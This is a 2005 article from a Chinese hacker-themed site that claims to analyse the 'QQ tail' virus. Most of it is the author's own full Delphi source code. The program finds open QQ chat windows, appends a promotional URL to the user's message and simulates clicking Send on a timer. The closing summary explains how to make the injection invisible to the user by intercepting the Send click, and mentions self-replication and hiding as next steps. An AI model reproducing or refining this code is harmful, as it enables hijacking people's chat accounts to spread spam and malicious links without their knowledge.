 |
  |
|
| 首页 | 技术文章 | 软件下载 | 博客 | 论坛 | 精品教程 | 黑客动画 | 视频资源 | 在线服务 | 黑客游戏 | | ||||
 |
|
|||||||
|
||||||||
|
|||||
| QQ尾巴病毒的发送原理分析 | |||||
作者:冷枫 文章来源:IT安全网 点击数: 更新时间:2005-1-13  |
|||||
|
近来QQ尾巴病毒大肆发作,我也是经常收到网友们发到来的带尾巴的消息,于是,好奇心一来,我也来研究研究此病毒的发作原理。首先,我不知道QQ尾巴病毒真正的原理,我只是猜测并且自己写了一个类似的程序来实现它。 QQ尾巴的发作情况:当用户打开一个QQ消息发送窗口时,病毒会自动往消息文本框里输入文本,然后不等用户反应过来就发出去了。 程序实现:首先要找到QQ消息发送窗口的句柄以及消息文本框与“发送”按钮的窗口句柄。 一、 如何找到QQ消息发送窗口句柄: QQ消息发送窗口有两种,一种是消息模式,在这种情况下,窗口标题含有“发送消息”字样;一种是聊天模式,窗口标题含有“聊天中”字样; 通过枚举窗口就可找到相应的句柄: // 取得QQ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; 二、 如何找到“发送”按钮窗口句柄: 找到了QQ的发送消息窗口后,就可以进一步查找“发送”按钮句柄了,如窗口句柄为qqWnd,则可以用一个循环,查找文本中含有“发送”字样的窗口,经过试验发现,“发送”按钮恰恰是窗体的第一个子窗口,这样,可以用 btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 来获得“发送”按钮的句柄。 三、 如何找到消息文本框窗口句柄: 消息文本框并不好找,不过你可以先在消息文本框中输入几个字母,如“abcd”,这样我们就可以用上述方法来查找了,不过通过实验后,发现消息文本框并不是QQ窗口的直接子窗口,而是其中一个子窗口的子窗口,通过实验,可以用 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 来获得。 四、 如何获得原消息文本框的文本: 要获取原消息文本框的文本,只需要一个API函数就行了,如下: // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var Ret:LongInt; mText:PChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; 五、 如何住原消息文本框里追加文本: 与取文本相反 // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var Ret:LongInt; mText:PChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; 六、 如果让“发送”按钮自动点击: 一切都准备好了,现在要开始发送了,为了让消息自动发送,我们可以模拟“发送”按钮被点击了。 SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); 通过模拟一个鼠标在“开始”按钮上的按下与放开,就实现了点击发送功能。 七、 其它的定时功能比较简单,在此也不多说了。 八、 全部源代码如下: unit Unit1; interface uses Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, ExtCtrls; type TForm1 = class(TForm) Timer1: TTimer; Button1: TButton; Edit1: TEdit; Label1: TLabel; Button2: TButton; procedure Timer1Timer(Sender: TObject); procedure Button1Click(Sender: TObject); procedure Button2Click(Sender: TObject); private { Private declarations } public { Public declarations } end; var Form1: TForm1; implementation {$R *.dfm} // 获得窗口文本 function GetWndText(hWnd: HWND): String; Var Ret:LongInt; mText:PChar; Buf:Integer; begin Ret:=SendMessage(hWnd,WM_GETTEXTLENGTH,0,0)+1; GetMem(mText,Ret); try Buf:=LongInt(mText); SendMessage(hWnd,WM_GETTEXT,Ret,Buf); Result:=StrPas(mText); finally FreeMem(mText,Ret); end; end; // 发送文本到窗口 procedure SetWndText(hWnd: HWND; Text: String); Var Ret:LongInt; mText:PChar; Buf:Integer; begin GetMem(mText,Length(Text)); StrCopy(mText,PChar(Text)); try Buf:=LongInt(mText); SendMessage(hWnd,WM_SETTEXT,0,Buf); finally FreeMem(mText,Length(Text)); end; end; // 取得QQ的发送消息窗口 function GetQQWnd: HWND; var hCurrentWindow: HWnd; WndText:String; begin hCurrentWindow := GetWindow(Application.Handle, GW_HWNDFIRST); while hCurrentWindow <> 0 do begin WndText:=GetWndText(hCurrentWindow); if (Pos('聊天中',WndText)>0) or (Pos('发送消息',WndText)>0) then begin Result:=hCurrentWindow; Exit; end; hCurrentWindow := GetWindow(hCurrentWindow, GW_HWNDNEXT); end; Result:=0; end; // 定时处理 procedure TimerProc; var qqWnd,txtWnd,btnWnd:HWND; Msg:String; begin qqWnd:=GetQQWnd; if qqWnd=0 then Exit; btnWnd:=GetDlgItem(qqWnd,1); // 发送按钮 txtWnd:=GetWindow(GetDlgItem(qqWnd,0),GW_CHILD); // 文本框 if (btnWnd=0) or (txtWnd=0) then Exit; Msg:=GetWndText(txtWnd); Msg:=Msg+#13+#10+'欢迎光临绿荫网络http://www.lvyin.net'; SetWndText(txtWnd,Msg); SendMessage(btnWnd,WM_LBUTTONDOWN,MK_LBUTTON,0); SendMessage(btnWnd,WM_LBUTTONUP,0,0); end; procedure TForm1.Timer1Timer(Sender: TObject); begin TimerProc; end; procedure TForm1.Button1Click(Sender: TObject); begin Timer1.Enabled :=not Timer1.Enabled; if Timer1.Enabled then Button1.Caption :='停 止' else Button1.Caption :='开 始'; end; procedure TForm1.Button2Click(Sender: TObject); begin Timer1.Interval :=StrToInt(Edit1.Text); end; end. 总结:上面只讲述了QQ消息自动发送的主要功能,这或许跟QQ尾巴的原理不同(我也不知道),但总体上应该差不多。如果要做到让用户感觉不到异常,就要改一下了,不要自动发送,而是在当用户点击了“发送”按钮后再把文本加进去。这样的话可是拦截“发送”按钮的点击消息,然后再用上述方法把文本加进去,然后把消息交还原程序处理。至于如何让它成为病毒,会自我复制,自我隐藏等功能,那又是另外一个话题了,在此就不多讲了。 |
|||||
| 文章录入:IceRiver 责任编辑:IceRiver | |||||
| 【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 | |||||
| 最新热点 | 最新推荐 | 相关文章 | ||
| 消除局域网内使用QQ后带来的 对最新QQ医生 1.4版杀毒方式 QQ拼音输入法截图展示 当心QQ通行证偷你密码 瑞星安 QQ通行证木马通过伪装的页面 快报!腾讯QQ 2008版将在半年 网上现窃取QQ群号大盗 用户应 机构数据: QQ市场占有率为M 腾讯将在下周公测TM2008 QQ2 抢先看!QQ2008+TM2008功能最 |
 网友评论:(只显示最新5条。评论内容只代表网友观点,与本站立场无关!) |
 |
|
| 关于我们 - 版权声明 - 帮助(?) - 广告服务 - 联系我们 - 友情链接 - 用户注册 - | Powered by ICE RIVER - STUDIO |
|
|
| » CnXHacker.CoM |  |
© CopyRight 2002-2006, CnXHacker.CoM™, Inc. All Rights Reserved. |
